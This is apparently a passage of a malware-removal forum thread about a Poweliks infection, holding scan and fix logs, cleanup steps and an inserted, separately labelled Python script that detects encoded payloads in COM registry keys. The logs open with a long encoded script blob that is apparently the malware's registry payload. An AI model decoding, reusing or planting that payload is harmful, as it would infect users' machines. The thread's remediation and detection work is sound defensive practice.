WF\(gup:t61G1fiA1S}3,njx\^LwF\!oA}iwA f"(?Vw}JH%\HT"h^(x2I3o p`s6n 9$p`s$pjN$#q1A\Ts~1Vwf}!wA5VtwFf^2H!xP?Zsd oW*Cq0Ftsw2UV]spZVAqSa|ZFCIb,f}jAW9iF;pjw/#sI!5LV\[TgS]2"FHAIB^A.1tT4AHVwi5K]~j`Y*"w3s}]pqVo\HY2gqwVSy"T6jgf9L]nJ+gpty\$p0s$}Z.*ijD|]x9o5joxpN3\9!g\?AIFHA2*j_9ZUit$SXR*i2wsIjB:th^Z}!w$pq3-[_w9PV4 6(gH5:];jZqFdy4(p`s$IGtBjAtx`is~pj^/\?O&UCBKHo~EtkDTIsm.P`I&tP4ftXD"5]A}A635 "\}A9 KVIijZqFdz%7p(99P:"25jBxe+"Zi3w$p:5*FZqFJ"T\}jw95xLSI`.A5jxu1 tupNj-6AIA5isAr2^}jswV9(2xF+t\iL"/rU,f}NAfijkyj2"\5Lt2._92"s~rs,"5ZF-jVW\9"t~pjA.\Vx:n!o3t%4Z}?O9K_mTiVN2Hoz!]fg]":2q}Zp :4u}y}+SZIf}`s35 w;1x9P]C9c:CB|H3&*J&9/HAIt^Z.1^T4\}3gedX12p`2 9Fw}N_N]+j9-\^Vs`i.~pjj4}kDc5jBAii&h f"TIbY9[0tWtu5hiOT}K4~jAtwjLg"l:2"1VVUCb,?\ht~Syz"^ ^A9 t3tjDS#MIfm0wB}N3\[Twp[M4f]~HwA!mFwXpq1(m09HjVNZ5p}\lKt"HM0hqC^\\oT!Cjxf1w9+6`5*PV"Wtyt"t2HxlAc\\XDH4o5fSH%.[Aw1}32Zj:IX\2`!12#1[UaCi:I*p`wh[ZsA}i"ZH2w "yt2+VFwtswX|2Vep`If}`2h\i1A1sT*]C^9tj#fi ^M[!4].yVf[2Vw\Pt!CKt"9 ^SGIZU.~up0.2?0I/6:2 \z/Hj:I.Ps"I\&B*]u\c]f"Bl;,+JH,5\pjHi:\G\(sN?`.A: Xi:j"rU%A^qp\\Pt~pjw$}jjA5joAP3xw}9$p`s/}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`2knPY(.^;[ftXqFqN(/"\^fZArHt8i2Vy[!jYJVxq(x]a4qjEUlT}o9-mw1s^ }wI+..S384^xgWIaN6%aCt("3}q6stys!ti\\^3\q(:HZlq,E`MO24 IsmboGty2om+.H4:jd\y&E\Ma/(o\w^x"q5q6}^s,!t g!F?SG\ }Tp;t45x^T}jY[(U68#`VE99HH(?X8#j^E9f\XpjX4#j^;NGHz 8FNFjzW !^;9s$Zm^!wn?02S0V;Ns,.tUo31/hX1KAA6ZShf}hJ/"\^Z0{|wYPno1!t ZEixj;9MsD}U*9(x"sms,Ajy.z[sVL\pH!Kwz^ 4t(sTv6V9V[2"s4V.UeoIV]hOX]xj;I&]a4y*p( ^;NV.z|;tUeUAF1+.HHy&;tMX/&2Ht8!X(ClV42N}^s,L}j0/FM9V&2)KZ9*9Mj8(j!dZ9X[V.4o#!kFjB8x5ytVT/ qj98x5"H^!d 8.98U5y\VZ2&Z4(?q*!`C"z(U32|U3;jq* 
(+Y^|Z"AJZ"hdf)/\/ShFKD15ysTeytGWPDVnM^TE#b*Jp+'mR";xvwQJ,kna,^+ -)mJ~ZSq#p81lOm4c#`8)Im^Wdnv#iVw0nAA==^#~@

HKEY_USERS\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\

========= End of Reg: =========

'HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32' => Key Deleted Successfully.
'HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}' => Key deleted successfully.
'HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}' => Key deleted successfully.
'HKCR\CLSID\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}'=> Key not found.
'HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}' => Key deleted successfully.
'HKCR\CLSID\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}'=> Key not found.
C:\ProgramData\TEMP => ":359B3BDA" ADS removed successfully.
C:\ProgramData\TEMP => ":430C6D84" ADS removed successfully.
C:\ProgramData\TEMP => ":9A870F8B" ADS removed successfully.
C:\ProgramData\TEMP => ":A8ADE5D8" ADS removed successfully.
C:\ProgramData\TEMP => ":C7DEC6B7" ADS removed successfully.
C:\ProgramData\TEMP => ":DFC5A2B2" ADS removed successfully.

The system needed a reboot.

==== End of Fixlog ====

 

ESET log:

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=6185376a08c4154ca049fa11639aef7a
# engine=19301
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-07-23 02:41:32
# local_time=2014-07-22 07:41:32 (-0800, Pacific Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='AVG Anti-Virus Free Edition 2012'
# compatibility_mode=1035 16777213 100 83 0 94789702 0 0
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5894 16777213 100 100 89685442 102838962 0 0
# scanned=297257
# found=7
# cleaned=0
# scan_time=5949
sh=67197C0ADB63091138587B423A56438F366B05AD ft=0 fh=0000000000000000 vn="HTML/Iframe.B.Gen virus" ac=I fn="C:\Users\MikeandBert\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UO0GVSUK\index[1].htm"
sh=7AC7E15D320F791344ABD5F8FF39F60E217A3867 ft=1 fh=155cc23c692c8ec9 vn="a variant of Win32/ExpressFiles potentially unwanted application" ac=I fn="D:\justin\Adobe_Photoshop_CS5_Classroom_in_a_Book_downloader_2502b.exe"
sh=7AC7E15D320F791344ABD5F8FF39F60E217A3867 ft=1 fh=155cc23c692c8ec9 vn="a variant of Win32/ExpressFiles potentially unwanted application" ac=I fn="D:\justin\Photography_and_Photoshop_Tutorials_Collection_Part_1_downloader_2502b.exe"
sh=5F3CB7125199AD0D6A41D4DD0C08E6A759E92CF9 ft=1 fh=6ac152fe2b2740a4 vn="Win32/Toolbar.Conduit potentially unwanted application" ac=I fn="D:\justin\zaSetupWeb_102_047_000_en.exe"
sh=57F8B537383C4139A55E3C707CC9A0130D7D6597 ft=1 fh=44391568d75e01d7 vn="Win32/Toolbar.Conduit potentially unwanted application" ac=I fn="D:\justin\desktop\New Folder\zaSetupWeb_102_034_000_en.exe"
sh=E0B37C57E99FE566CE70DE1FE6B0A8E222BC133A ft=1 fh=040dd3f1fe168480 vn="Win32/Somoto.F potentially unwanted application" ac=I fn="D:\Program Files\Vuze\.install4j\i4j_extf_20_5p83tu.exe"
sh=0AC76F0DCEC5A2957E9135A82012933D40AC6A63 ft=1 fh=f9c9bf4621013cb3 vn="a variant of Win32/Bunndle potentially unsafe application" ac=I fn="D:\Program Files\Vuze\.install4j\i4j_extf_32_5p83tu.dll"
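
The Fixlog above deletes a per-user `CLSID\{...}\localserver32` key. As an added example (not part of the thread or of any tool used in it), this triage script scans saved `reg query /s` text for per-user COM server keys whose values carry Script Encoder markers, oversized data, or unusual value names. The length threshold, the value-name allowlist, and the SID and GUIDs in the sample are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# Microsoft Script Encoder output (JScript.Encode / VBScript.Encode) is wrapped in these markers.
ENC_START = "#@~^"
ENC_END = "^#~@"
# Assumption: COM server values hold a path or short command line; longer data deserves a look.
MAX_DATA_LEN = 1024
# Assumption: value names commonly present under these keys; extend for your environment.
KNOWN_VALUE_NAMES = {
    "(default)", "threadingmodel", "serverexecutable", "localserver32",
    "inprocserver32", "assembly", "class", "codebase", "runtimeversion",
}

# Per-user COM server keys: HKU\<SID>_Classes, HKU\<SID>\Software\Classes, HKCU\Software\Classes.
USER_COM_KEY = re.compile(
    r"^(?:(?:HKEY_USERS|HKU)\\[^\\]+(?:_Classes|\\Software\\Classes)"
    r"|(?:HKEY_CURRENT_USER|HKCU)\\Software\\Classes)"
    r"\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\(LocalServer32|InprocServer32)\\?$",
    re.IGNORECASE,
)
# A value line as printed by reg query: indent, name, type, data, separated by four spaces.
VALUE_LINE = re.compile(r"^\s+(.+?)\s{4}(REG_[A-Z_]+)(?:\s{4}(.*))?$")
KEY_PREFIXES = ("HKEY_", "HKU\\", "HKCU\\", "HKLM\\", "HKCR\\")


@dataclass
class Finding:
    key: str
    clsid: str
    value_name: str
    reasons: list


def assess(name, data):
    """Return the list of reasons a value looks wrong for a COM server key."""
    reasons = []
    if ENC_START in data:
        reasons.append("encoded-script" if ENC_END in data else "encoded-script-unterminated")
    if len(data) > MAX_DATA_LEN:
        reasons.append("oversized-data")
    if name.lower() not in KNOWN_VALUE_NAMES:
        reasons.append("unusual-value-name")
    return reasons


def scan_reg_query(text):
    """Scan reg query text (e.g. reg query HKCU\\Software\\Classes\\CLSID /s) for findings."""
    values = []     # [ (key, clsid), value name, [data parts] ]
    current = None  # set while inside a per-user LocalServer32/InprocServer32 key
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        if line.upper().startswith(KEY_PREFIXES):
            m = USER_COM_KEY.match(line)
            current = (line.rstrip("\\"), m.group(1).upper()) if m else None
            continue
        if current is None:
            continue
        m = VALUE_LINE.match(line)
        if m:
            values.append([current, m.group(1), [m.group(3) or ""]])
        elif values and values[-1][0] is current:
            # Assumption: data containing line breaks spills onto following lines.
            values[-1][2].append(line.strip())
    findings = []
    for (key, clsid), name, parts in values:
        reasons = assess(name, "".join(parts))
        if reasons:
            findings.append(Finding(key, clsid, name, reasons))
    return findings


# Constructed sample: placeholder SID and GUIDs, filler instead of any real payload.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
FILLER = "A" * 1500


def user_key(guid, server):
    return "HKEY_USERS\\%s_Classes\\CLSID\\{%s}\\%s" % (SID, guid, server)


SAMPLE = "\n".join([
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\InprocServer32",
    "    (Default)    REG_SZ    C:\\Program Files\\ExampleApp\\ext.dll",
    "",
    user_key("22222222-2222-2222-2222-222222222222", "InprocServer32"),
    "    (Default)    REG_SZ    C:\\Users\\example\\AppData\\Local\\ExampleApp\\shellext.dll",
    "    ThreadingModel    REG_SZ    Apartment",
    "",
    user_key("33333333-3333-3333-3333-333333333333", "localserver32"),
    "    a    REG_SZ    " + ENC_START + FILLER[:700],
    FILLER[700:] + ENC_END,
])

if __name__ == "__main__":
    for f in scan_reg_query(SAMPLE):
        print(f.clsid, f.value_name, ",".join(f.reasons))
```

Machine-wide keys and ordinary per-user registrations pass silently; a hit is a lead to inspect, not a verdict.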
 



#10 aharonov

  • Malware Response Team

Posted 23 July 2014 - 03:02 PM

This is looking good! No more active malware has been found.


The author of Combofix has asked you to upload some files so that he can analyze why Combofix didn't delete this infection and improve the detection. Thank you in advance for providing them as follows:
  • Please go to the directory C:\WINDOWS\erdnt\Hiv-backup.
  • Pack the folder Users to a zip archive (right click on it and choose Send to -> Compressed (zipped) folder).
  • Click here to upload this zip file to the author of Combofix:
    • Copy-paste the link to your topic into the respective text box.
    • Click on 'Browse', find and select the zip file you've just created and click 'Open'.
    • Write "Poweliks - User Hives" into the comments textbox.
    • Click on 'Send File'


That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Reader X (10.1.2)
Java 6 Update 26
Java 6 Update 5
Mozilla Firefox 12.0
Opera 11.64




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" by Lawrence Abrams.

#11 aharonov

  • Malware Response Team

Posted 03 September 2014 - 06:30 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



